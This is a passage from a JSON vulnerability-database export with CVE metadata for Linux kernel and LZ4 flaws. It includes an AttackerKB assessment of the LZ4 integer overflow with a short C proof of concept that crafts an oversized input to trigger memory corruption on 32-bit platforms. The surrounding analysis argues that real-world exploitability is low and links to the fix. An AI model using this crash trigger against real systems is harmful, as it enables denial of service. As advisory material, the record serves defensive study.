"AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9178", "CVE-2016-9644"], "modified": "2017-01-07T03:00:00", "cpe": ["cpe:/o:linux:linux_kernel:4.4.28", "cpe:/o:linux:linux_kernel:4.4.26", "cpe:/o:linux:linux_kernel:4.4.25", "cpe:/o:linux:linux_kernel:4.4.27", "cpe:/o:linux:linux_kernel:4.4.24", "cpe:/o:linux:linux_kernel:4.4.23", "cpe:/o:linux:linux_kernel:4.4.22"], "id": "CVE-2016-9644", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9644", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.4.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.4.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.4.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.4.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.4.26:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.4.28:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:4.4.24:*:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2021-07-20T20:13:48", "description": "Integer overflow in the LZ4 algorithm implementation, as used in Yann Collet LZ4 before r118 and in the lz4_uncompress function in lib/lz4/lz4_decompress.c in the Linux kernel before 3.15.2, on 32-bit platforms might allow context-dependent attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a crafted Literal Run that would be improperly handled by programs not complying with an API limitation, a different vulnerability than CVE-2014-4715.\n\n \n**Recent assessments:** \n \n**wchen-r7** at September 12, 2019 6:07pm UTC reported:\n\nOn Jun 26th, Don A. Bailey of Security Mouse published a blog detailing an integer overflow within \nthe LZO algorithm, specifically the LZ4 variant. The writeup can be found here:\n\n<http://blog.securitymouse.com/2014/06/raising-lazarus-20-year-old-bug-that.html>\n\nPoC Example (Windows 32-bit):\n \n \n #include \"lz4.h\"\n \n char output[20<<20];\n char input[20<<20];\n int main(int argc, char* argv[]) {\n input[0] = 0x0F;\n input[1] = 0x00;\n input[2] = 0x00;\n for(int i = 3; i < 16800000; i++)\n input[i] = 0xff;\n LZ4_uncompress(input, output, 20<<20);\n return 0;\n }\n \n\nThe LZ4 algorithm is vulnerable but in the real world no implementations are because either the \nnecessary vulnerable conditions aren\u2019t dialed in correctly, or there is something else in place \n(in the software or by operating system) that prevents the bug from exploitation. The flaw \nrequires the following conditions:\n\n * Must be in a 32-bit environment, which means all servers are safe from this issue. \n\n * The attacker need to forge a special compressed block to overflow a 32-bit address space and \ncause the decoding process to overflow, but it can only be done if the compressed block is \nsomething like 16MB or more. Some real-world implementations: \n* Legacy LZ4 file format is limited to 8MB, newer format is at 4MB. \n* ZFS = 128KB \n* zram = 4KB \n* Linux kernel = 8MB (uses LZ4 legacy) \n* Antivirus unpacking uses the official documented LZ4 (4MB max, 8MB if legacy format) \n* The latest lzo.c in FFmpeg is set at (10*1024*1024) + 16 (that\u2019s 10MB + 16 bytes), and is allocated \non the heap. However, matroskadec.c uses av_lzo1x_decode() with its own implementation and as \nfar as I can tell there is no hard size limit. \n\n * The attack is most likely local \n\n\nFrom the attacker\u2019s perspective, it\u2019s difficult to find apps out there that are actually vulnerable, \nbecause so far we have not found one that exceeds 10MB, and we need something like 16MB. It\u2019s even \nmore difficult to find them exploitable because of other memory corruption mitigations supported by \nmodern operating systems.\n\nThe fix in LZ4 can be found here (there is also a testing tool in fuzz.c): \n<https://github.com/Cyan4973/lz4/commit/da5373197e84ee49d75b8334d4510689731d6e90>\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {}, "published": "2014-07-03T00:00:00", "type": "attackerkb", "title": "The LZO/LZ4 Integer Overflow Summary", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4611", "CVE-2014-4715"], "modified": "2020-02-13T00:00:00", "id": "AKB:AB7462E1-84B6-45B0-8D93-6857FB1CE045", "href": "https://attackerkb.com/topics/7IAOfmR8XA/the-lzo-lz4-integer-overflow-summary", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "f5": [{"lastseen": "2016-11-09T00:09:31", "description": "Vulnerability Recommended Actions\n\nNone\n\nSupplemental